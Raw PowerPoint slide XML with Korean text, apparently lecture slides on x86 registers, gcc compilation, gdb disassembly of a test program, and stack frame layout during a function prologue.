                <a:t>12</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>123</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>0x11dc010</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gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> ./</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code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gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>) set disassembly-flavor intel</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gdb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>disas</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> main</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B78BE11-CD1A-4935-943F-FE3C672F955F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="1720" b="32424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244427" y="5229340"/>
            <a:ext cx="5403978" cy="1067211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B010F1-3A2A-4AC1-9E0A-DD6FC1CD7809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1666684" y="3338497"/>
            <a:ext cx="3216212" cy="2958054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199676024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그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FFCE75E-B13B-4D5F-9953-EF24EBE09664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122763" y="4398042"/>
            <a:ext cx="3407245" cy="2115487"/>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 메모리 구조</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8" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE2E4275-ED97-4E73-8D3F-3A6E04DCDD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3687" y="1838265"/>
            <a:ext cx="3914775" cy="4619625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 아래쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBBBF2EF-017B-4F30-B3BF-CC90D53C5E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826386" y="3788318"/>
            <a:ext cx="156341" cy="5962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아래쪽 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CED58A-1EC0-436F-9D11-37DDFA71CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12550818">
            <a:off x="4676782" y="2616803"/>
            <a:ext cx="196666" cy="20604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6F56E4B1-61FA-431E-AD92-BC4F511F96B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373785" y="3878537"/>
            <a:ext cx="1493520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> compile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D978D9-A765-43CD-9E1E-5975625C5A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="5603705"/>
            <a:ext cx="735431" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>b[20]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="그림 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB40FA0-7C7E-403F-BBB6-EC1D45CC8941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903948" y="1780907"/>
            <a:ext cx="2078766" cy="1911909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B477217-15EE-4902-869D-049CBACCAE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="4070060"/>
            <a:ext cx="735431" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14413065-392F-4C07-8928-092718753163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="3277864"/>
            <a:ext cx="735431" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84187060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1" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D674E-A205-4EA5-B390-E71BBA9D94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867" b="44132"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755903" y="3497816"/>
            <a:ext cx="4611625" cy="12133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5" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD847FB-5DFD-4C06-A9F5-9E954FDE39FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2909125197"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5949767" y="2139696"/>
          <a:ext cx="5680546" cy="3749040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="815937">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="883920">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1077728472"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3980689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="326902">
                <a:tc rowSpan="9">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>범용 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>레지스터</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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EAX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산술 연산 및 논리 연산 수행</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EBX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510751">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ECX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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>반복문</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 사용 시 반복 카운터로 사용</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 반복할 횟수 지정하고 반복 작업 수행</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766126">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EDX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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>EAX </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t>레지스터와 같이 쓰임</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 부호 확장 명령 등에 사용</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 큰 수의 곱셈 또는 나눗셈 연산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EDI</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복사할 때 목적지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ESI</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데이터를 조작하거나 복사할 때 데이터의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ESP</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스택의 끝 지점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EBP</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스택의 첫 시작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510751">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EIP</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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다음에 실행해야 할 명령어의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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F923A64-ACB8-4426-B10D-EF30114C7CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517284" y="2332714"/>
            <a:ext cx="5113220" cy="794534"/>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범용 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>레지스터들 중에서 각각 특별한 용도가 정해져 있는 레지스터</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204752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그림 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BB2ACF1-7215-471F-B6E0-081714EE3E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648264" y="2026232"/>
            <a:ext cx="5297351" cy="3661331"/>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2" name="직선 화살표 연결선 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3814B75-819F-46B6-805F-DCFADAC9A079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2104792"/>
            <a:ext cx="19141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8A5A0F43-3065-463B-AA7E-1BE7E4F501B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="202623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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 저장한다  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=  SFP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="직선 화살표 연결선 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55706FD-9937-4194-AFF6-E3D0A0106830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2287672"/>
            <a:ext cx="161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57FB1239-C138-4054-A166-AB6EDBB73630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="220911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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="직선 화살표 연결선 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26CC0EE-73CC-4F0A-BF8A-8D3CE56E21F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639056" y="2470552"/>
            <a:ext cx="15422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EFD97CC9-140F-4D29-B084-C95A8E1A2B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="239199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Esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60 = 96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 늘린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. = 4*20 + 16</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="직선 화살표 연결선 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F517A26B-8831-4F91-B2E8-43B1247E816D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2818024"/>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402864CE-DD73-473B-B555-ADE96938F605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
